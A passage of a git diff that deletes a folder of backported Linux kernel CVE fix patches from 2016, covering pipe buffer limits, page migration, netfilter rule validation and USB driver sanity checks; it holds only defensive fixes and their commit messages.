-+		if (!too_many_pipe_buffers_hard(user)) {
-+			if (too_many_pipe_buffers_soft(user))
-+				pipe_bufs = 1;
-+			pipe->bufs = kzalloc(sizeof(struct pipe_buffer) * pipe_bufs, GFP_KERNEL);
-+		}
-+
- 		if (pipe->bufs) {
- 			init_waitqueue_head(&pipe->wait);
- 			pipe->r_counter = pipe->w_counter = 1;
--			pipe->buffers = PIPE_DEF_BUFFERS;
-+			pipe->buffers = pipe_bufs;
-+			pipe->user = user;
-+			account_pipe_buffers(pipe, 0, pipe_bufs);
- 			mutex_init(&pipe->mutex);
- 			return pipe;
- 		}
-+		free_uid(user);
- 		kfree(pipe);
- 	}
- 
-@@ -607,6 +642,8 @@ void free_pipe_info(struct pipe_inode_info *pipe)
- {
- 	int i;
- 
-+	account_pipe_buffers(pipe, pipe->buffers, 0);
-+	free_uid(pipe->user);
- 	for (i = 0; i < pipe->buffers; i++) {
- 		struct pipe_buffer *buf = pipe->bufs + i;
- 		if (buf->ops)
-@@ -998,6 +1035,7 @@ static long pipe_set_size(struct pipe_inode_info *pipe, unsigned long nr_pages)
- 			memcpy(bufs + head, pipe->bufs, tail * sizeof(struct pipe_buffer));
- 	}
- 
-+	account_pipe_buffers(pipe, pipe->buffers, nr_pages);
- 	pipe->curbuf = 0;
- 	kfree(pipe->bufs);
- 	pipe->bufs = bufs;
-@@ -1069,6 +1107,11 @@ long pipe_fcntl(struct file *file, unsigned int cmd, unsigned long arg)
- 		if (!capable(CAP_SYS_RESOURCE) && size > pipe_max_size) {
- 			ret = -EPERM;
- 			goto out;
-+		} else if ((too_many_pipe_buffers_hard(pipe->user) ||
-+			    too_many_pipe_buffers_soft(pipe->user)) &&
-+		           !capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN)) {
-+			ret = -EPERM;
-+			goto out;
- 		}
- 		ret = pipe_set_size(pipe, nr_pages);
- 		break;
-diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h
-index eb8b8ac..24f5470 100644
---- a/include/linux/pipe_fs_i.h
-+++ b/include/linux/pipe_fs_i.h
-@@ -42,6 +42,7 @@ struct pipe_buffer {
-  *	@fasync_readers: reader side fasync
-  *	@fasync_writers: writer side fasync
-  *	@bufs: the circular array of pipe buffers
-+ *	@user: the user who created this pipe
-  **/
- struct pipe_inode_info {
- 	struct mutex mutex;
-@@ -57,6 +58,7 @@ struct pipe_inode_info {
- 	struct fasync_struct *fasync_readers;
- 	struct fasync_struct *fasync_writers;
- 	struct pipe_buffer *bufs;
-+	struct user_struct *user;
- };
- 
- /*
-@@ -123,6 +125,8 @@ void pipe_unlock(struct pipe_inode_info *);
- void pipe_double_lock(struct pipe_inode_info *, struct pipe_inode_info *);
- 
- extern unsigned int pipe_max_size, pipe_min_size;
-+extern unsigned long pipe_user_pages_hard;
-+extern unsigned long pipe_user_pages_soft;
- int pipe_proc_fn(struct ctl_table *, int, void __user *, size_t *, loff_t *);
- 
- 
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 61aa9bb..1589ddc8 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -835,6 +835,7 @@ struct user_struct {
- #endif
- 	unsigned long locked_shm; /* How many pages of mlocked shm ? */
- 	unsigned long unix_inflight;	/* How many files in flight in unix sockets */
-+	atomic_long_t pipe_bufs;  /* how many pages are allocated in pipe buffers */
- 
- #ifdef CONFIG_KEYS
- 	struct key *uid_keyring;	/* UID specific keyring */
-diff --git a/kernel/sysctl.c b/kernel/sysctl.c
-index c810f8a..f6fd236 100644
---- a/kernel/sysctl.c
-+++ b/kernel/sysctl.c
-@@ -1757,6 +1757,20 @@ static struct ctl_table fs_table[] = {
- 		.proc_handler	= &pipe_proc_fn,
- 		.extra1		= &pipe_min_size,
- 	},
-+	{
-+		.procname	= "pipe-user-pages-hard",
-+		.data		= &pipe_user_pages_hard,
-+		.maxlen		= sizeof(pipe_user_pages_hard),
-+		.mode		= 0644,
-+		.proc_handler	= proc_doulongvec_minmax,
-+	},
-+	{
-+		.procname	= "pipe-user-pages-soft",
-+		.data		= &pipe_user_pages_soft,
-+		.maxlen		= sizeof(pipe_user_pages_soft),
-+		.mode		= 0644,
-+		.proc_handler	= proc_doulongvec_minmax,
-+	},
- 	{ }
- };
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch
deleted file mode 100644
index 0c801170..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3070/ANY/0001.patch
+++ /dev/null
@@ -1,163 +0,0 @@
-From af110cc4b24250faafd4f3b9879cf51e350d7799 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Fri, 15 Jul 2016 15:08:19 -0400
-Subject: mm: migrate dirty page without clear_page_dirty_for_io etc
-
-commit 42cb14b110a5698ccf26ce59c4441722605a3743 upstream.
-
-clear_page_dirty_for_io() has accumulated writeback and memcg subtleties
-since v2.6.16 first introduced page migration; and the set_page_dirty()
-which completed its migration of PageDirty, later had to be moderated to
-__set_page_dirty_nobuffers(); then PageSwapBacked had to skip that too.
-
-No actual problems seen with this procedure recently, but if you look into
-what the clear_page_dirty_for_io(page)+set_page_dirty(newpage) is actually
-achieving, it turns out to be nothing more than moving the PageDirty flag,
-and its NR_FILE_DIRTY stat from one zone to another.
-
-It would be good to avoid a pile of irrelevant decrementations and
-incrementations, and improper event counting, and unnecessary descent of
-the radix_tree under tree_lock (to set the PAGECACHE_TAG_DIRTY which
-radix_tree_replace_slot() left in place anyway).
-
-Do the NR_FILE_DIRTY movement, like the other stats movements, while
-interrupts still disabled in migrate_page_move_mapping(); and don't even
-bother if the zone is the same.  Do the PageDirty movement there under
-tree_lock too, where old page is frozen and newpage not yet visible:
-bearing in mind that as soon as newpage becomes visible in radix_tree, an
-un-page-locked set_page_dirty() might interfere (or perhaps that's just
-not possible: anything doing so should already hold an additional
-reference to the old page, preventing its migration; but play safe).
-
-But we do still need to transfer PageDirty in migrate_page_copy(), for
-those who don't go the mapping route through migrate_page_move_mapping().
-
-CVE-2016-3070
-
-Signed-off-by: Hugh Dickins <hughd@google.com>
-Cc: Christoph Lameter <cl@linux.com>
-Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
-Cc: Rik van Riel <riel@redhat.com>
-Cc: Vlastimil Babka <vbabka@suse.cz>
-Cc: Davidlohr Bueso <dave@stgolabs.net>
-Cc: Oleg Nesterov <oleg@redhat.com>
-Cc: Sasha Levin <sasha.levin@oracle.com>
-Cc: Dmitry Vyukov <dvyukov@google.com>
-Cc: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-[ciwillia@brocade.com: backported to 3.10: adjusted context]
-Signed-off-by: Charles (Chas) Williams <ciwillia@brocade.com>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
----
- mm/migrate.c | 51 +++++++++++++++++++++++++++++++--------------------
- 1 file changed, 31 insertions(+), 20 deletions(-)
-
-diff --git a/mm/migrate.c b/mm/migrate.c
-index a88c12f..a61500f 100644
---- a/mm/migrate.c
-+++ b/mm/migrate.c
-@@ -30,6 +30,7 @@
- #include <linux/mempolicy.h>
- #include <linux/vmalloc.h>
- #include <linux/security.h>
-+#include <linux/backing-dev.h>
- #include <linux/memcontrol.h>
- #include <linux/syscalls.h>
- #include <linux/hugetlb.h>
-@@ -311,6 +312,8 @@ static int migrate_page_move_mapping(struct address_space *mapping,
- 		struct page *newpage, struct page *page,
- 		struct buffer_head *head, enum migrate_mode mode)
- {
-+	struct zone *oldzone, *newzone;
-+	int dirty;
- 	int expected_count = 0;
- 	void **pslot;
- 
-@@ -321,6 +324,9 @@ static int migrate_page_move_mapping(struct address_space *mapping,
- 		return MIGRATEPAGE_SUCCESS;
- 	}
- 
-+	oldzone = page_zone(page);
-+	newzone = page_zone(newpage);
-+
- 	spin_lock_irq(&mapping->tree_lock);
- 
- 	pslot = radix_tree_lookup_slot(&mapping->page_tree,
-@@ -361,6 +367,13 @@ static int migrate_page_move_mapping(struct address_space *mapping,
- 		set_page_private(newpage, page_private(page));
- 	}
- 
-+	/* Move dirty while page refs frozen and newpage not yet exposed */
-+	dirty = PageDirty(page);
-+	if (dirty) {
-+		ClearPageDirty(page);
-+		SetPageDirty(newpage);
-+	}
-+
- 	radix_tree_replace_slot(pslot, newpage);
- 
- 	/*
-@@ -370,6 +383,9 @@ static int migrate_page_move_mapping(struct address_space *mapping,
- 	 */
- 	page_unfreeze_refs(page, expected_count - 1);
- 
-+	spin_unlock(&mapping->tree_lock);
-+	/* Leave irq disabled to prevent preemption while updating stats */
-+
- 	/*
- 	 * If moved to a different zone then also account
- 	 * the page for that zone. Other VM counters will be
-@@ -380,13 +396,19 @@ static int migrate_page_move_mapping(struct address_space *mapping,
- 	 * via NR_FILE_PAGES and NR_ANON_PAGES if they
- 	 * are mapped to swap space.
- 	 */
--	__dec_zone_page_state(page, NR_FILE_PAGES);
--	__inc_zone_page_state(newpage, NR_FILE_PAGES);
--	if (!PageSwapCache(page) && PageSwapBacked(page)) {
--		__dec_zone_page_state(page, NR_SHMEM);
--		__inc_zone_page_state(newpage, NR_SHMEM);
-+	if (newzone != oldzone) {
-+		__dec_zone_state(oldzone, NR_FILE_PAGES);
-+		__inc_zone_state(newzone, NR_FILE_PAGES);
-+		if (PageSwapBacked(page) && !PageSwapCache(page)) {
-+			__dec_zone_state(oldzone, NR_SHMEM);
-+			__inc_zone_state(newzone, NR_SHMEM);
-+		}
-+		if (dirty && mapping_cap_account_dirty(mapping)) {
-+			__dec_zone_state(oldzone, NR_FILE_DIRTY);
-+			__inc_zone_state(newzone, NR_FILE_DIRTY);
-+		}
- 	}
--	spin_unlock_irq(&mapping->tree_lock);
-+	local_irq_enable();
- 
- 	return MIGRATEPAGE_SUCCESS;
- }
-@@ -460,20 +482,9 @@ void migrate_page_copy(struct page *newpage, struct page *page)
- 	if (PageMappedToDisk(page))
- 		SetPageMappedToDisk(newpage);
- 
--	if (PageDirty(page)) {
--		clear_page_dirty_for_io(page);
--		/*
--		 * Want to mark the page and the radix tree as dirty, and
--		 * redo the accounting that clear_page_dirty_for_io undid,
--		 * but we can't use set_page_dirty because that function
--		 * is actually a signal that all of the page has become dirty.
--		 * Whereas only part of our page may be dirty.
--		 */
--		if (PageSwapBacked(page))
--			SetPageDirty(newpage);
--		else
--			__set_page_dirty_nobuffers(newpage);
-- 	}
-+	/* Move dirty on pages not done by migrate_page_move_mapping() */
-+	if (PageDirty(page))
-+		SetPageDirty(newpage);
- 
- 	mlock_migrate_page(newpage, page);
- 	ksm_migrate_page(newpage, page);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch
deleted file mode 100644
index 87dd172a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3134/ANY/0001.patch
+++ /dev/null
@@ -1,234 +0,0 @@
-From 54d83fc74aa9ec72794373cb47432c5f7fb1a309 Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Tue, 22 Mar 2016 18:02:52 +0100
-Subject: netfilter: x_tables: fix unconditional helper
-
-Ben Hawkes says:
-
- In the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it
- is possible for a user-supplied ipt_entry structure to have a large
- next_offset field. This field is not bounds checked prior to writing a
- counter value at the supplied offset.
-
-Problem is that mark_source_chains should not have been called --
-the rule doesn't have a next entry, so its supposed to return
-an absolute verdict of either ACCEPT or DROP.
-
-However, the function conditional() doesn't work as the name implies.
-It only checks that the rule is using wildcard address matching.
-
-However, an unconditional rule must also not be using any matches
-(no -m args).
-
-The underflow validator only checked the addresses, therefore
-passing the 'unconditional absolute verdict' test, while
-mark_source_chains also tested for presence of matches, and thus
-proceeeded to the next (not-existent) rule.
-
-Unify this so that all the callers have same idea of 'unconditional rule'.
-
-Reported-by: Ben Hawkes <hawkes@google.com>
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/ipv4/netfilter/arp_tables.c | 18 +++++++++---------
- net/ipv4/netfilter/ip_tables.c  | 23 +++++++++++------------
- net/ipv6/netfilter/ip6_tables.c | 23 +++++++++++------------
- 3 files changed, 31 insertions(+), 33 deletions(-)
-
-diff --git a/net/ipv4/netfilter/arp_tables.c b/net/ipv4/netfilter/arp_tables.c
-index 51d4fe5..a1bb5e7 100644
---- a/net/ipv4/netfilter/arp_tables.c
-+++ b/net/ipv4/netfilter/arp_tables.c
-@@ -359,11 +359,12 @@ unsigned int arpt_do_table(struct sk_buff *skb,
- }
- 
- /* All zeroes == unconditional rule. */
--static inline bool unconditional(const struct arpt_arp *arp)
-+static inline bool unconditional(const struct arpt_entry *e)
- {
- 	static const struct arpt_arp uncond;
- 
--	return memcmp(arp, &uncond, sizeof(uncond)) == 0;
-+	return e->target_offset == sizeof(struct arpt_entry) &&
-+	       memcmp(&e->arp, &uncond, sizeof(uncond)) == 0;
- }
- 
- /* Figures out from what hook each rule can be called: returns 0 if
-@@ -402,11 +403,10 @@ static int mark_source_chains(const struct xt_table_info *newinfo,
- 				|= ((1 << hook) | (1 << NF_ARP_NUMHOOKS));
- 
- 			/* Unconditional return/END. */
--			if ((e->target_offset == sizeof(struct arpt_entry) &&
-+			if ((unconditional(e) &&
- 			     (strcmp(t->target.u.user.name,
- 				     XT_STANDARD_TARGET) == 0) &&
--			     t->verdict < 0 && unconditional(&e->arp)) ||
--			    visited) {
-+			     t->verdict < 0) || visited) {
- 				unsigned int oldpos, size;
- 
- 				if ((strcmp(t->target.u.user.name,
-@@ -551,7 +551,7 @@ static bool check_underflow(const struct arpt_entry *e)
- 	const struct xt_entry_target *t;
- 	unsigned int verdict;
- 
--	if (!unconditional(&e->arp))
-+	if (!unconditional(e))
- 		return false;
- 	t = arpt_get_target_c(e);
- 	if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0)
-@@ -598,9 +598,9 @@ static inline int check_entry_size_and_hooks(struct arpt_entry *e,
- 			newinfo->hook_entry[h] = hook_entries[h];
- 		if ((unsigned char *)e - base == underflows[h]) {
- 			if (!check_underflow(e)) {
--				pr_err("Underflows must be unconditional and "
--				       "use the STANDARD target with "
--				       "ACCEPT/DROP\n");
-+				pr_debug("Underflows must be unconditional and "
-+					 "use the STANDARD target with "
-+					 "ACCEPT/DROP\n");
- 				return -EINVAL;
- 			}
- 			newinfo->underflow[h] = underflows[h];
-diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
-index fb7694e6..89b5d95 100644
---- a/net/ipv4/netfilter/ip_tables.c
-+++ b/net/ipv4/netfilter/ip_tables.c
-@@ -168,11 +168,12 @@ get_entry(const void *base, unsigned int offset)
- 
- /* All zeroes == unconditional rule. */
- /* Mildly perf critical (only if packet tracing is on) */
--static inline bool unconditional(const struct ipt_ip *ip)
-+static inline bool unconditional(const struct ipt_entry *e)
- {
- 	static const struct ipt_ip uncond;
- 
--	return memcmp(ip, &uncond, sizeof(uncond)) == 0;
-+	return e->target_offset == sizeof(struct ipt_entry) &&
-+	       memcmp(&e->ip, &uncond, sizeof(uncond)) == 0;
- #undef FWINV
- }
- 
-@@ -229,11 +230,10 @@ get_chainname_rulenum(const struct ipt_entry *s, const struct ipt_entry *e,
- 	} else if (s == e) {
- 		(*rulenum)++;
- 
--		if (s->target_offset == sizeof(struct ipt_entry) &&
-+		if (unconditional(s) &&
- 		    strcmp(t->target.u.kernel.target->name,
- 			   XT_STANDARD_TARGET) == 0 &&
--		   t->verdict < 0 &&
--		   unconditional(&s->ip)) {
-+		   t->verdict < 0) {
- 			/* Tail of chains: STANDARD target (return/policy) */
- 			*comment = *chainname == hookname
- 				? comments[NF_IP_TRACE_COMMENT_POLICY]
-@@ -476,11 +476,10 @@ mark_source_chains(const struct xt_table_info *newinfo,
- 			e->comefrom |= ((1 << hook) | (1 << NF_INET_NUMHOOKS));
- 
- 			/* Unconditional return/END. */
--			if ((e->target_offset == sizeof(struct ipt_entry) &&
-+			if ((unconditional(e) &&
- 			     (strcmp(t->target.u.user.name,
- 				     XT_STANDARD_TARGET) == 0) &&
--			     t->verdict < 0 && unconditional(&e->ip)) ||
--			    visited) {
-+			     t->verdict < 0) || visited) {
- 				unsigned int oldpos, size;
- 
- 				if ((strcmp(t->target.u.user.name,
-@@ -715,7 +714,7 @@ static bool check_underflow(const struct ipt_entry *e)
- 	const struct xt_entry_target *t;
- 	unsigned int verdict;
- 
--	if (!unconditional(&e->ip))
-+	if (!unconditional(e))
- 		return false;
- 	t = ipt_get_target_c(e);
- 	if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0)
-@@ -763,9 +762,9 @@ check_entry_size_and_hooks(struct ipt_entry *e,
- 			newinfo->hook_entry[h] = hook_entries[h];
- 		if ((unsigned char *)e - base == underflows[h]) {
- 			if (!check_underflow(e)) {
--				pr_err("Underflows must be unconditional and "
--				       "use the STANDARD target with "
--				       "ACCEPT/DROP\n");
-+				pr_debug("Underflows must be unconditional and "
-+					 "use the STANDARD target with "
-+					 "ACCEPT/DROP\n");
- 				return -EINVAL;
- 			}
- 			newinfo->underflow[h] = underflows[h];
-diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
-index b248528f..541b59f 100644
---- a/net/ipv6/netfilter/ip6_tables.c
-+++ b/net/ipv6/netfilter/ip6_tables.c
-@@ -198,11 +198,12 @@ get_entry(const void *base, unsigned int offset)
- 
- /* All zeroes == unconditional rule. */
- /* Mildly perf critical (only if packet tracing is on) */
--static inline bool unconditional(const struct ip6t_ip6 *ipv6)
-+static inline bool unconditional(const struct ip6t_entry *e)
- {
- 	static const struct ip6t_ip6 uncond;
- 
--	return memcmp(ipv6, &uncond, sizeof(uncond)) == 0;
-+	return e->target_offset == sizeof(struct ip6t_entry) &&
-+	       memcmp(&e->ipv6, &uncond, sizeof(uncond)) == 0;
- }
- 
- static inline const struct xt_entry_target *
-@@ -258,11 +259,10 @@ get_chainname_rulenum(const struct ip6t_entry *s, const struct ip6t_entry *e,
- 	} else if (s == e) {
- 		(*rulenum)++;
- 
--		if (s->target_offset == sizeof(struct ip6t_entry) &&
-+		if (unconditional(s) &&
- 		    strcmp(t->target.u.kernel.target->name,
- 			   XT_STANDARD_TARGET) == 0 &&
--		    t->verdict < 0 &&
--		    unconditional(&s->ipv6)) {
-+		    t->verdict < 0) {
- 			/* Tail of chains: STANDARD target (return/policy) */
- 			*comment = *chainname == hookname
- 				? comments[NF_IP6_TRACE_COMMENT_POLICY]
-@@ -488,11 +488,10 @@ mark_source_chains(const struct xt_table_info *newinfo,
- 			e->comefrom |= ((1 << hook) | (1 << NF_INET_NUMHOOKS));
- 
- 			/* Unconditional return/END. */
--			if ((e->target_offset == sizeof(struct ip6t_entry) &&
-+			if ((unconditional(e) &&
- 			     (strcmp(t->target.u.user.name,
- 				     XT_STANDARD_TARGET) == 0) &&
--			     t->verdict < 0 &&
--			     unconditional(&e->ipv6)) || visited) {
-+			     t->verdict < 0) || visited) {
- 				unsigned int oldpos, size;
- 
- 				if ((strcmp(t->target.u.user.name,
-@@ -727,7 +726,7 @@ static bool check_underflow(const struct ip6t_entry *e)
- 	const struct xt_entry_target *t;
- 	unsigned int verdict;
- 
--	if (!unconditional(&e->ipv6))
-+	if (!unconditional(e))
- 		return false;
- 	t = ip6t_get_target_c(e);
- 	if (strcmp(t->u.user.name, XT_STANDARD_TARGET) != 0)
-@@ -775,9 +774,9 @@ check_entry_size_and_hooks(struct ip6t_entry *e,
- 			newinfo->hook_entry[h] = hook_entries[h];
- 		if ((unsigned char *)e - base == underflows[h]) {
- 			if (!check_underflow(e)) {
--				pr_err("Underflows must be unconditional and "
--				       "use the STANDARD target with "
--				       "ACCEPT/DROP\n");
-+				pr_debug("Underflows must be unconditional and "
-+					 "use the STANDARD target with "
-+					 "ACCEPT/DROP\n");
- 				return -EINVAL;
- 			}
- 			newinfo->underflow[h] = underflows[h];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch
deleted file mode 100644
index 97ba8166..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3135/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From d157bd761585605b7882935ffb86286919f62ea1 Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Thu, 10 Mar 2016 01:56:23 +0100
-Subject: netfilter: x_tables: check for size overflow
-
-Ben Hawkes says:
- integer overflow in xt_alloc_table_info, which on 32-bit systems can
- lead to small structure allocation and a copy_from_user based heap
- corruption.
-
-Reported-by: Ben Hawkes <hawkes@google.com>
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/x_tables.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
-index d0cd2b9..582c9cf 100644
---- a/net/netfilter/x_tables.c
-+++ b/net/netfilter/x_tables.c
-@@ -659,6 +659,9 @@ struct xt_table_info *xt_alloc_table_info(unsigned int size)
- 	struct xt_table_info *info = NULL;
- 	size_t sz = sizeof(*info) + size;
- 
-+	if (sz < sizeof(*info))
-+		return NULL;
-+
- 	/* Pedantry: prevent them from hitting BUG() in vmalloc.c --RR */
- 	if ((SMP_ALIGN(size) >> PAGE_SHIFT) + 2 > totalram_pages)
- 		return NULL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch
deleted file mode 100644
index 2809018d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3136/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 4e9a0b05257f29cf4b75f3209243ed71614d062e Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Thu, 31 Mar 2016 12:04:24 -0400
-Subject: USB: mct_u232: add sanity checking in probe
-
-An attack using the lack of sanity checking in probe is known. This
-patch checks for the existence of a second port.
-
-CVE-2016-3136
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-CC: stable@vger.kernel.org
-[johan: add error message ]
-Signed-off-by: Johan Hovold <johan@kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/serial/mct_u232.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/serial/mct_u232.c b/drivers/usb/serial/mct_u232.c
-index 4446b8d..8856553 100644
---- a/drivers/usb/serial/mct_u232.c
-+++ b/drivers/usb/serial/mct_u232.c
-@@ -376,14 +376,21 @@ static void mct_u232_msr_to_state(struct usb_serial_port *port,
- 
- static int mct_u232_port_probe(struct usb_serial_port *port)
- {
-+	struct usb_serial *serial = port->serial;
- 	struct mct_u232_private *priv;
- 
-+	/* check first to simplify error handling */
-+	if (!serial->port[1] || !serial->port[1]->interrupt_in_urb) {
-+		dev_err(&port->dev, "expected endpoint missing\n");
-+		return -ENODEV;
-+	}
-+
- 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
- 	if (!priv)
- 		return -ENOMEM;
- 
- 	/* Use second interrupt-in endpoint for reading. */
--	priv->read_urb = port->serial->port[1]->interrupt_in_urb;
-+	priv->read_urb = serial->port[1]->interrupt_in_urb;
- 	priv->read_urb->context = port;
- 
- 	spin_lock_init(&priv->lock);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch
deleted file mode 100644
index c54514e3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3137/ANY/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From c55aee1bf0e6b6feec8b2927b43f7a09a6d5f754 Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Thu, 31 Mar 2016 12:04:25 -0400
-Subject: USB: cypress_m8: add endpoint sanity check
-
-An attack using missing endpoints exists.
-
-CVE-2016-3137
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-CC: stable@vger.kernel.org
-Signed-off-by: Johan Hovold <johan@kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/serial/cypress_m8.c | 11 +++++------
- 1 file changed, 5 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/usb/serial/cypress_m8.c b/drivers/usb/serial/cypress_m8.c
-index b283eb8..bbeeb2b 100644
---- a/drivers/usb/serial/cypress_m8.c
-+++ b/drivers/usb/serial/cypress_m8.c
-@@ -447,6 +447,11 @@ static int cypress_generic_port_probe(struct usb_serial_port *port)
- 	struct usb_serial *serial = port->serial;
- 	struct cypress_private *priv;
- 
-+	if (!port->interrupt_out_urb || !port->interrupt_in_urb) {
-+		dev_err(&port->dev, "required endpoint is missing\n");
-+		return -ENODEV;
-+	}
-+
- 	priv = kzalloc(sizeof(struct cypress_private), GFP_KERNEL);
- 	if (!priv)
- 		return -ENOMEM;
-@@ -606,12 +611,6 @@ static int cypress_open(struct tty_struct *tty, struct usb_serial_port *port)
- 		cypress_set_termios(tty, port, &priv->tmp_termios);
- 
- 	/* setup the port and start reading from the device */
--	if (!port->interrupt_in_urb) {
--		dev_err(&port->dev, "%s - interrupt_in_urb is empty!\n",
--			__func__);
--		return -1;
--	}
--
- 	usb_fill_int_urb(port->interrupt_in_urb, serial->dev,
- 		usb_rcvintpipe(serial->dev, port->interrupt_in_endpointAddress),
- 		port->interrupt_in_urb->transfer_buffer,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch
deleted file mode 100644
index 0abd439f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3138/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 8835ba4a39cf53f705417b3b3a94eb067673f2c9 Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Tue, 15 Mar 2016 10:14:04 +0100
-Subject: USB: cdc-acm: more sanity checking
-
-An attack has become available which pretends to be a quirky
-device circumventing normal sanity checks and crashes the kernel
-by an insufficient number of interfaces. This patch adds a check
-to the code path for quirky devices.
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-CC: stable@vger.kernel.org
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/class/cdc-acm.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
-index 1d2c99a..83fd30b 100644
---- a/drivers/usb/class/cdc-acm.c
-+++ b/drivers/usb/class/cdc-acm.c
-@@ -1179,6 +1179,9 @@ static int acm_probe(struct usb_interface *intf,
- 	if (quirks == NO_UNION_NORMAL) {
- 		data_interface = usb_ifnum_to_if(usb_dev, 1);
- 		control_interface = usb_ifnum_to_if(usb_dev, 0);
-+		/* we would crash */
-+		if (!data_interface || !control_interface)
-+			return -ENODEV;
- 		goto skip_normal_probe;
- 	}
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch
deleted file mode 100644
index 21067f69..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3140/ANY/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From 5a07975ad0a36708c6b0a5b9fea1ff811d0b0c1f Mon Sep 17 00:00:00 2001
-From: Oliver Neukum <oneukum@suse.com>
-Date: Thu, 31 Mar 2016 12:04:26 -0400
-Subject: USB: digi_acceleport: do sanity checking for the number of ports
-
-The driver can be crashed with devices that expose crafted descriptors
-with too few endpoints.
-
-See: http://seclists.org/bugtraq/2016/Mar/61
-
-Signed-off-by: Oliver Neukum <ONeukum@suse.com>
-[johan: fix OOB endpoint check and add error messages ]
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Johan Hovold <johan@kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/serial/digi_acceleport.c | 19 +++++++++++++++++++
- 1 file changed, 19 insertions(+)
-
-diff --git a/drivers/usb/serial/digi_acceleport.c b/drivers/usb/serial/digi_acceleport.c
-index 010a42a..16e8e37 100644
---- a/drivers/usb/serial/digi_acceleport.c
-+++ b/drivers/usb/serial/digi_acceleport.c
-@@ -1251,8 +1251,27 @@ static int digi_port_init(struct usb_serial_port *port, unsigned port_num)
- 
- static int digi_startup(struct usb_serial *serial)
- {
-+	struct device *dev = &serial->interface->dev;
- 	struct digi_serial *serial_priv;
- 	int ret;
-+	int i;
-+
-+	/* check whether the device has the expected number of endpoints */
-+	if (serial->num_port_pointers < serial->type->num_ports + 1) {
-+		dev_err(dev, "OOB endpoints missing\n");
-+		return -ENODEV;
-+	}
-+
-+	for (i = 0; i < serial->type->num_ports + 1 ; i++) {
-+		if (!serial->port[i]->read_urb) {
-+			dev_err(dev, "bulk-in endpoint missing\n");
-+			return -ENODEV;
-+		}
-+		if (!serial->port[i]->write_urb) {
